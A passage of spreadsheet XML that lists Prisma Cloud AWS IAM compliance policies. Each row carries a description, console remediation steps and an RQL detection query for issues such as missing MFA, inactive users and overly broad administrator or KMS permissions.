3. Under 'Security Credentials', check "Assigned MFA Device" and follow the instructions to enable MFA for the user.</t>
        </is>
      </c>
      <c r="Y58" t="inlineStr"/>
      <c r="Z58" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' and api.name='aws-iam-get-credential-report' AND json.rule='user does not equal "&lt;root_account&gt;" and password_enabled equals true and mfa_active is false'</t>
        </is>
      </c>
      <c r="AA58" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB58" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC58" t="inlineStr">
        <is>
          <t>PC-AWS-IAM-19</t>
        </is>
      </c>
      <c r="AD58" t="b">
        <v>1</v>
      </c>
      <c r="AE58" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF58" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG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8" t="inlineStr">
        <is>
          <t>50af1c0a-ab70-44dd-b6f6-3529e795131f</t>
        </is>
      </c>
      <c r="AI58" t="inlineStr">
        <is>
          <t>50af1c0a-ab70-44dd-b6f6-3529e795131f</t>
        </is>
      </c>
      <c r="AJ58" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK58" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="59">
      <c r="A59" t="inlineStr">
        <is>
          <t>Awesome Standard</t>
        </is>
      </c>
      <c r="B59" s="2" t="inlineStr">
        <is>
          <t>Awesome Inc</t>
        </is>
      </c>
      <c r="C59" s="2" t="inlineStr">
        <is>
          <t>Secure access management</t>
        </is>
      </c>
      <c r="D59" t="inlineStr"/>
      <c r="E59" t="inlineStr"/>
      <c r="F59" t="inlineStr"/>
      <c r="G59" t="b">
        <v>1</v>
      </c>
      <c r="H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59" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J59" t="inlineStr">
        <is>
          <t>aws-iam</t>
        </is>
      </c>
      <c r="K59" t="inlineStr">
        <is>
          <t>AWS Inactive users for more than 30 days</t>
        </is>
      </c>
      <c r="L59" t="inlineStr">
        <is>
          <t>UNUSED_PRIVILEGES</t>
        </is>
      </c>
      <c r="M59" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N59" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O59" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P59" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q59" t="inlineStr">
        <is>
          <t>Protect</t>
        </is>
      </c>
      <c r="R59" t="inlineStr">
        <is>
          <t>Secure access management</t>
        </is>
      </c>
      <c r="S59" t="inlineStr">
        <is>
          <t>CIS,Awesome_Standard,AW_AWS_Secure access management</t>
        </is>
      </c>
      <c r="T59" t="b">
        <v>0</v>
      </c>
      <c r="U59" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V59" t="inlineStr">
        <is>
          <t>aws-iam-get-credential-report</t>
        </is>
      </c>
      <c r="W59" t="inlineStr">
        <is>
          <t>This policy identifies users who are inactive for more than 30 days. Inactive user accounts are an easy target for attacker because any activity on the account will largely get unnoticed.
NOTE: Exception to this policy is, it is not valid for SSO login users and Root users</t>
        </is>
      </c>
      <c r="X59" t="inlineStr">
        <is>
          <t>1.Sign in to AWS console and navigate to IAM.
2.Identify the user reported and Make sure that the user has legitimate reason to be inactive for such an extended period.
3. Delete the user account, if the user no longer needs access to the console or no longer exists.</t>
        </is>
      </c>
      <c r="Y59" t="inlineStr"/>
      <c r="Z59" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' and api.name = 'aws-iam-get-credential-report' AND json.rule = 'user does not equal &lt;root_account&gt; and _DateTime.ageInDays(user_creation_time) &gt; 30 and (password_last_used equals N/A or password_last_used equals no_information or _DateTime.ageInDays(password_last_used) &gt; 30) and ((access_key_1_last_used_date equals N/A or _DateTime.ageInDays(access_key_1_last_used_date) &gt; 30) and (access_key_2_last_used_date equals N/A or _DateTime.ageInDays(access_key_2_last_used_date) &gt; 30))'</t>
        </is>
      </c>
      <c r="AA59" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB59" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC59" t="inlineStr">
        <is>
          <t>PC-AWS-IAM-26</t>
        </is>
      </c>
      <c r="AD59" t="b">
        <v>1</v>
      </c>
      <c r="AE59" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF59" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG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59" t="inlineStr">
        <is>
          <t>deb8a07d-b5d1-4105-a10b-fc94f8a34854</t>
        </is>
      </c>
      <c r="AI59" t="inlineStr">
        <is>
          <t>619b20cf-7cb5-4e53-a768-be9a85bd58e8</t>
        </is>
      </c>
      <c r="AJ59" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK59" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="60">
      <c r="A60" t="inlineStr">
        <is>
          <t>Awesome Standard</t>
        </is>
      </c>
      <c r="B60" s="2" t="inlineStr">
        <is>
          <t>Awesome Inc</t>
        </is>
      </c>
      <c r="C60" s="2" t="inlineStr">
        <is>
          <t>Secure access management</t>
        </is>
      </c>
      <c r="D60" t="inlineStr"/>
      <c r="E60" t="inlineStr"/>
      <c r="F60" t="inlineStr"/>
      <c r="G60" t="b">
        <v>1</v>
      </c>
      <c r="H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0" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J60" t="inlineStr">
        <is>
          <t>aws-iam</t>
        </is>
      </c>
      <c r="K60" t="inlineStr">
        <is>
          <t>AWS IAM policy allows full administrative privileges</t>
        </is>
      </c>
      <c r="L60" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M60" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N60" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O60" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P60" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q60" t="inlineStr">
        <is>
          <t>Protect</t>
        </is>
      </c>
      <c r="R60" t="inlineStr">
        <is>
          <t>Secure access management</t>
        </is>
      </c>
      <c r="S60" t="inlineStr">
        <is>
          <t>Policy Status Review,Prisma_Cloud,Awesome_Standard,AW_AWS_Secure access management</t>
        </is>
      </c>
      <c r="T60" t="b">
        <v>0</v>
      </c>
      <c r="U60" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V60" t="inlineStr">
        <is>
          <t>aws-iam-get-policy-version</t>
        </is>
      </c>
      <c r="W60" t="inlineStr">
        <is>
          <t>This policy identifies IAM policies with full administrative privileges. IAM policies are the means by which privileges are granted to users, groups, or roles. It is recommended and considered a standard security advice to grant least privilege like granting only the permissions required to perform a task. Determine what users need to do and then craft policies for them that let the users perform only those tasks, instead of allowing full administrative privileges.</t>
        </is>
      </c>
      <c r="X60" t="inlineStr">
        <is>
          <t>1. Log in to the AWS Console
2. Navigate to the IAM dashboard
3. In the navigation pane, click on Policies and then search for the policy name reported
4. Select the policy, click on the 'Policy actions', select 'Detach'
5. Select all Users, Groups, Roles that have this policy attached, Click on 'Detach policy' 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-iam-policies/bc-aws-356
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-iam-policies/bc-aws-356</t>
        </is>
      </c>
      <c r="Y60" t="inlineStr"/>
      <c r="Z60" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-iam-get-policy-version' AND json.rule = isAttached is true and document.Statement[?any(Action anyStartWith * and Resource equals * and Effect equals Allow)] exists and (policyArn exists and policyArn does not contain iam::aws:policy/AdministratorAccess)
{"category":"IAM","resourceTypes":["aws_iam_policy"]}</t>
        </is>
      </c>
      <c r="AA60" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB60" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC60" t="inlineStr">
        <is>
          <t>PC-AWS-IAM-46-CKV_AWS_356</t>
        </is>
      </c>
      <c r="AD60" t="b">
        <v>1</v>
      </c>
      <c r="AE60" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF60" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG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0" t="inlineStr">
        <is>
          <t>d9b86448-11a2-f9d4-74a5-f6fc590caeef</t>
        </is>
      </c>
      <c r="AI60" t="inlineStr">
        <is>
          <t>ccf65e9c-8c63-4a1d-89f3-1b01ff2439b3</t>
        </is>
      </c>
      <c r="AJ60" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK60" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="61">
      <c r="A61" t="inlineStr">
        <is>
          <t>Awesome Standard</t>
        </is>
      </c>
      <c r="B61" s="2" t="inlineStr">
        <is>
          <t>Awesome Inc</t>
        </is>
      </c>
      <c r="C61" s="2" t="inlineStr">
        <is>
          <t>Secure access management</t>
        </is>
      </c>
      <c r="D61" t="inlineStr"/>
      <c r="E61" t="inlineStr"/>
      <c r="F61" t="inlineStr"/>
      <c r="G61" t="b">
        <v>1</v>
      </c>
      <c r="H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1" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J61" t="inlineStr">
        <is>
          <t>aws-iam</t>
        </is>
      </c>
      <c r="K61" t="inlineStr">
        <is>
          <t>AWS IAM policy allows decryption actions on all KMS keys</t>
        </is>
      </c>
      <c r="L61" t="inlineStr">
        <is>
          <t>KEYS_AND_SECRETS</t>
        </is>
      </c>
      <c r="M61" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N61" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O61" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P61" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q61" t="inlineStr">
        <is>
          <t>Protect</t>
        </is>
      </c>
      <c r="R61" t="inlineStr">
        <is>
          <t>Secure access management</t>
        </is>
      </c>
      <c r="S61" t="inlineStr">
        <is>
          <t>Awesome_Standard,AW_AWS_Secure access management</t>
        </is>
      </c>
      <c r="T61" t="b">
        <v>0</v>
      </c>
      <c r="U61" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V61" t="inlineStr">
        <is>
          <t>aws-iam-get-policy-version</t>
        </is>
      </c>
      <c r="W61" t="inlineStr">
        <is>
          <t>This policy identifies IAM policies that allow decryption actions on all KMS keys. Instead of granting permissions for all keys, determine the minimum set of keys that users need to access encrypted data. You should grant to identities only the kms:Decrypt or kms:ReEncryptFrom permissions and only for the keys that are required to perform a task. By adopting the principle of least privilege, you can reduce the risk of unintended disclosure of your data.</t>
        </is>
      </c>
      <c r="X61" t="inlineStr">
        <is>
          <t>To allow a user to encrypt and decrypt with any CMK in a specific AWS account; refer following example:
https://docs.aws.amazon.com/kms/latest/developerguide/customer-managed-policies.html#iam-policy-example-encrypt-decrypt-one-account
To allow a user to encrypt and decrypt with any CMK in a specific AWS account and Region; refer following example:
https://docs.aws.amazon.com/kms/latest/developerguide/customer-managed-policies.html#iam-policy-example-encrypt-decrypt-one-account-one-region
To allow a user to encrypt and decrypt with specific CMKs; refer following example:
https://docs.aws.amazon.com/kms/latest/developerguide/customer-managed-policies.html#iam-policy-example-encrypt-decrypt-specific-cmks</t>
        </is>
      </c>
      <c r="Y61" t="inlineStr"/>
      <c r="Z61" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name= 'aws-iam-get-policy-version' AND json.rule = document.Statement[?any(Effect equals Allow and Resource equals * and (Action contains kms:* or Action contains kms:Decrypt or Action contains kms:ReEncryptFrom) and Condition does not exist)] exists</t>
        </is>
      </c>
      <c r="AA61" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB61" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC61" t="inlineStr">
        <is>
          <t>PC-AWS-IAM-710</t>
        </is>
      </c>
      <c r="AD61" t="b">
        <v>1</v>
      </c>
      <c r="AE61" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF61" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG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1" t="inlineStr">
        <is>
          <t>1eb7db29-9561-418e-a038-1344c3c79014</t>
        </is>
      </c>
      <c r="AI61" t="inlineStr">
        <is>
          <t>03031e98-0ad6-4ce2-a00e-16ddd85b4f22</t>
        </is>
      </c>
      <c r="AJ61" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK61" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="62">
      <c r="A62" t="inlineStr">
        <is>
          <t>Awesome Standard</t>
        </is>
      </c>
      <c r="B62" s="2" t="inlineStr">
        <is>
          <t>Awesome Inc</t>
        </is>
      </c>
      <c r="C62" s="2" t="inlineStr">
        <is>
          <t>Secure access management</t>
        </is>
      </c>
      <c r="D62" t="n">
        <v>0</v>
      </c>
      <c r="E62" t="n">
        <v>0</v>
      </c>
      <c r="F62" t="n">
        <v>56</v>
      </c>
      <c r="G62" t="b">
        <v>1</v>
      </c>
      <c r="H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2" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J62" t="inlineStr">
        <is>
          <t>aws-iam</t>
        </is>
      </c>
      <c r="K62" t="inlineStr">
        <is>
          <t>AWS IAM policy attached to users</t>
        </is>
      </c>
      <c r="L62" t="inlineStr">
        <is>
          <t>HIGH_PRIVILEGED_ROLE</t>
        </is>
      </c>
      <c r="M62" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N62" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O62" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P62" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q62" t="inlineStr">
        <is>
          <t>Protect</t>
        </is>
      </c>
      <c r="R62" t="inlineStr">
        <is>
          <t>Secure access management</t>
        </is>
      </c>
      <c r="S62" t="inlineStr">
        <is>
          <t>Identity Misconfiguration,Prisma_Cloud,Awesome_Standard,AW_AWS_Secure access management</t>
        </is>
      </c>
      <c r="T62" t="b">
        <v>0</v>
      </c>
      <c r="U62" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V62" t="inlineStr">
        <is>
          <t>aws-iam-list-attached-user-policies</t>
        </is>
      </c>
      <c r="W62" t="inlineStr">
        <is>
          <t>This policy identifies IAM policies attached to user. By default, IAM users, groups, and roles have no access to AWS resources. IAM policies are the means by which privileges are granted to users, groups, or roles. It is recommended that IAM policies be applied directly to groups but not users.</t>
        </is>
      </c>
      <c r="X62" t="inlineStr">
        <is>
          <t>1. Sign in to the AWS Console
2. Navigate to the 'IAM' service.
3. Identify the users that were specifically assigned to the reported IAM policy.
4. If a group with a similar policy already exists, put the user into that group. If such a group does not exist, create a new group with relevant policy and assign the user to the group. 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-iam-policies/iam-16-iam-policy-privileges-1
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-iam-policies/iam-16-iam-policy-privileges-1</t>
        </is>
      </c>
      <c r="Y62" t="inlineStr"/>
      <c r="Z62" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' and api.name='aws-iam-list-attached-user-policies' AND json.rule='attachedPolicies isType Array and not attachedPolicies size == 0'
{"category":"IAM","resourceTypes":["aws_iam_user_policy","aws_iam_user_policy_attachment","aws_iam_policy_attachment"]}</t>
        </is>
      </c>
      <c r="AA62" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB62" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC62" t="inlineStr">
        <is>
          <t>PC-AWS-IAM-17-CKV_AWS_40</t>
        </is>
      </c>
      <c r="AD62" t="b">
        <v>1</v>
      </c>
      <c r="AE62" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF62" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG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2" t="inlineStr">
        <is>
          <t>2b7e07ba-56c8-42db-8db4-a4b65f5066c4</t>
        </is>
      </c>
      <c r="AI62" t="inlineStr">
        <is>
          <t>2b7e07ba-56c8-42db-8db4-a4b65f5066c4</t>
        </is>
      </c>
      <c r="AJ62" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK62" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="63">
      <c r="A63" t="inlineStr">
        <is>
          <t>Awesome Standard</t>
        </is>
      </c>
      <c r="B63" s="2" t="inlineStr">
        <is>
          <t>Awesome Inc</t>
        </is>
      </c>
      <c r="C63" s="2" t="inlineStr">
        <is>
          <t>Secure access management</t>
        </is>
      </c>
      <c r="D63" t="inlineStr"/>
      <c r="E63" t="inlineStr"/>
      <c r="F63" t="inlineStr"/>
      <c r="G63" t="b">
        <v>0</v>
      </c>
      <c r="H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3" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J63" t="inlineStr">
        <is>
          <t>aws-iam</t>
        </is>
      </c>
      <c r="K63" t="inlineStr">
        <is>
          <t>AWS IAM Groups with administrator access permissions</t>
        </is>
      </c>
      <c r="L63" t="inlineStr">
        <is>
          <t>HIGH_PRIVILEGED_ROLE</t>
        </is>
      </c>
      <c r="M63" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N63" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O63" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P63" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q63" t="inlineStr">
        <is>
          <t>Protect</t>
        </is>
      </c>
      <c r="R63" t="inlineStr">
        <is>
          <t>Secure access management</t>
        </is>
      </c>
      <c r="S63" t="inlineStr">
        <is>
          <t>Prisma_Cloud,Awesome_Standard,Policy Status Review,AW_AWS_Secure access management</t>
        </is>
      </c>
      <c r="T63" t="b">
        <v>0</v>
      </c>
      <c r="U63" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V63" t="inlineStr">
        <is>
          <t>aws-iam-list-groups</t>
        </is>
      </c>
      <c r="W63" t="inlineStr">
        <is>
          <t>This policy identifies AWS IAM groups which has administrator access permission set. This would allow all users under this group to have administrative privileges. As a security best practice, it is recommended to grant least privilege access like granting only the permissions required to perform a task, instead of providing excessive permissions.</t>
        </is>
      </c>
      <c r="X63" t="inlineStr">
        <is>
          <t>1. Log in to AWS console
2. Navigate to IAM service
3. Click on Groups
4. Click on reported IAM group
5. Under 'Managed Policies' click on 'Detach Policy' which is having excessive permissions and assign a limited permission policy as required for a particular group
OR
6. Under 'Inline Policies' click on 'Edit Policy' or 'Remove Policy' and assign a limited permission as required for a particular group</t>
        </is>
      </c>
      <c r="Y63" t="inlineStr"/>
      <c r="Z63" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-iam-list-groups' as X; config from cloud.resource where api.name = 'aws-iam-get-policy-version' AND json.rule = document.Statement[?any(Effect equals Allow and Action equals * and Resource equals * )] exists as Y; filter "($.X.inlinePolicies[*].policyDocument.Statement[?(@.Effect=='Allow' &amp;&amp; @.Resource=='*')].Action any equal * ) or ($.X.attachedPolicies[*].policyArn intersects $.Y.policyArn)"; show X;</t>
        </is>
      </c>
      <c r="AA63" t="inlineStr">
        <is>
          <t>Oleg Kostine</t>
        </is>
      </c>
      <c r="AB63" t="inlineStr">
        <is>
          <t>2024-11-13 14:14:27</t>
        </is>
      </c>
      <c r="AC63" t="inlineStr">
        <is>
          <t>PC-AWS-IAM-538</t>
        </is>
      </c>
      <c r="AD63" t="b">
        <v>1</v>
      </c>
      <c r="AE63" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF63" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG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3" t="inlineStr">
        <is>
          <t>3b165f8d-1a65-41db-848d-d3783c4490ce</t>
        </is>
      </c>
      <c r="AI63" t="inlineStr">
        <is>
          <t>d0639c62-72cc-497a-8fb4-2d50dd13dd20</t>
        </is>
      </c>
      <c r="AJ63" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK63" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="64">
      <c r="A64" t="inlineStr">
        <is>
          <t>Awesome Standard</t>
        </is>
      </c>
      <c r="B64" s="2" t="inlineStr">
        <is>
          <t>Awesome Inc</t>
        </is>
      </c>
      <c r="C64" s="2" t="inlineStr">
        <is>
          <t>Detection services</t>
        </is>
      </c>
      <c r="D64" t="inlineStr"/>
      <c r="E64" t="inlineStr"/>
      <c r="F64" t="inlineStr"/>
      <c r="G64" t="b">
        <v>0</v>
      </c>
      <c r="H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4" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J64" t="inlineStr">
        <is>
          <t>aws-iam</t>
        </is>
      </c>
      <c r="K64" t="inlineStr">
        <is>
          <t>tadenugba_Policy2</t>
        </is>
      </c>
      <c r="L64" t="inlineStr"/>
      <c r="M64" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N64" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O64" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P64" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q64" t="inlineStr">
        <is>
          <t>Detect</t>
        </is>
      </c>
      <c r="R64" t="inlineStr">
        <is>
          <t>Detection services</t>
        </is>
      </c>
      <c r="S64" t="inlineStr">
        <is>
          <t>CIS,Awesome_Standard,AW_AWS_Detection services,Custom</t>
        </is>
      </c>
      <c r="T64" t="b">
        <v>0</v>
      </c>
      <c r="U64" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V64" t="inlineStr">
        <is>
          <t>aws-iam-list-roles</t>
        </is>
      </c>
      <c r="W64" t="inlineStr"/>
      <c r="X64" t="inlineStr"/>
      <c r="Y64" t="inlineStr"/>
      <c r="Z64" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-iam-list-roles' AND json.rule = role.roleName exists and role.roleName does not contain Admin and role.roleName does not contain Organization and role.roleName does not contain AWS and role.roleName does not contain cdk as X; config from cloud.resource where api.name = 'aws-iam-get-policy-version' as Y; filter "($.X.inlinePolicies[*].policyDocument.Statement[?(@.Effect=='Allow' &amp;&amp; @.Resource=='*')].Action any equal *) or ($.X.attachedPolicies[*].policyArn contains $.Y.policyArn and $.Y.document.Statement[?(@.Effect=='Allow' &amp;&amp; @.Resource=='*')].Action any equal *)"; show X;</t>
        </is>
      </c>
      <c r="AA64" t="inlineStr">
        <is>
          <t>Marius Banica</t>
        </is>
      </c>
      <c r="AB64" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC64" t="inlineStr"/>
      <c r="AD64" t="b">
        <v>0</v>
      </c>
      <c r="AE64" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF64" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG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4" t="inlineStr">
        <is>
          <t>fc10c877-6600-4f32-b8b8-09b60feee0cb</t>
        </is>
      </c>
      <c r="AI64" t="inlineStr">
        <is>
          <t>882af21a-350a-4484-91d6-d0f4619b24f3</t>
        </is>
      </c>
      <c r="AJ64" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK64" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="65">
      <c r="A65" t="inlineStr">
        <is>
          <t>Awesome Standard</t>
        </is>
      </c>
      <c r="B65" s="2" t="inlineStr">
        <is>
          <t>Awesome Inc</t>
        </is>
      </c>
      <c r="C65" s="2" t="inlineStr">
        <is>
          <t>Secure access management</t>
        </is>
      </c>
      <c r="D65" t="n">
        <v>0</v>
      </c>
      <c r="E65" t="n">
        <v>7</v>
      </c>
      <c r="F65" t="n">
        <v>0</v>
      </c>
      <c r="G65" t="b">
        <v>1</v>
      </c>
      <c r="H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5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J65" t="inlineStr">
        <is>
          <t>aws-iam</t>
        </is>
      </c>
      <c r="K65" t="inlineStr">
        <is>
          <t>AWS root account configured with Virtual MFA</t>
        </is>
      </c>
      <c r="L65" t="inlineStr">
        <is>
          <t>MFA</t>
        </is>
      </c>
      <c r="M65" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N65" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O65" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P65" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q65" t="inlineStr">
        <is>
          <t>Protect</t>
        </is>
      </c>
      <c r="R65" t="inlineStr">
        <is>
          <t>Secure access management</t>
        </is>
      </c>
      <c r="S65" t="inlineStr">
        <is>
          <t>Awesome_Standard,AW_AWS_Secure access management</t>
        </is>
      </c>
      <c r="T65" t="b">
        <v>0</v>
      </c>
      <c r="U65" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V65" t="inlineStr">
        <is>
          <t>aws-iam-list-virtual-mfa-devices</t>
        </is>
      </c>
      <c r="W65" t="inlineStr">
        <is>
          <t>This policy identifies AWS root accounts which are configured with Virtual MFA. Root is an important role in your account and root accounts must be configured with hardware MFA. Hardware MFA adds extra security because it requires users to type a unique authentication code from an approved authentication device when they access AWS websites or services.</t>
        </is>
      </c>
      <c r="X65" t="inlineStr">
        <is>
          <t>To manage MFA devices for your AWS account, you must use your root user credentials to sign in to AWS. You cannot manage MFA devices for the root user while signed in with other credentials.
1. Sign in to the AWS Management Console with your root user credentials
2. Go to IAM
3. Do one of the following:
Option 1: Choose Dashboard, and under Security Status, expand Activate MFA on your root account.
Option 2: On the right side of the navigation bar, select your account name, and then choose My Security Credentials. If necessary, choose Continue to Security Credentials. Then expand the Multi-Factor Authentication (MFA) section on the page.
4. Choose Manage MFA or Activate MFA, depending on which option you chose in the preceding step.
5. In the wizard, choose A hardware MFA device and then choose Next Step.
6. If you have U2F security key as hardware MFA device, choose U2F security key and click on Continue. Next plug the USB U2F security key, when setup is complete click on Close.
If you have any other hardware MFA device, choose Other hardware MFA device option
a. In the Serial Number box, type the serial number that is found on the back of the MFA device.
b. In the Authentication Code 1 box, type the six-digit number displayed by the MFA device. You might need to press the button on the front of the device to display the number.
c. Wait 30 seconds while the device refreshes the code, and then type the next six-digit number into the Authentication Code 2 box. You might need to press the button on the front of the device again to display the second number.
d. Choose Next Step. The MFA device is now associated with the AWS account.
Important:
Submit your request immediately after generating the authentication codes. If you generate the codes and then wait too long to submit the request, the MFA device successfully associates with the user but the MFA device becomes out of sync. This happens because time-based one-time passwords (TOTP) expire after a short period of time. If this happens, you can resync the device.</t>
        </is>
      </c>
      <c r="Y65" t="inlineStr"/>
      <c r="Z65" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-iam-list-virtual-mfa-devices' AND json.rule = 'serialNumber contains root-account-mfa-device and user.arn contains root'</t>
        </is>
      </c>
      <c r="AA65" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB65" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC65" t="inlineStr">
        <is>
          <t>PC-AWS-IAM-160</t>
        </is>
      </c>
      <c r="AD65" t="b">
        <v>1</v>
      </c>
      <c r="AE65" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF65" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG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5" t="inlineStr">
        <is>
          <t>2c0a0859-928e-46e7-a3b0-bf5af467b444</t>
        </is>
      </c>
      <c r="AI65" t="inlineStr">
        <is>
          <t>135e90ac-fbe6-45f9-aa8c-a4de7f4d15be</t>
        </is>
      </c>
      <c r="AJ65" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK65" t="inlineStr">
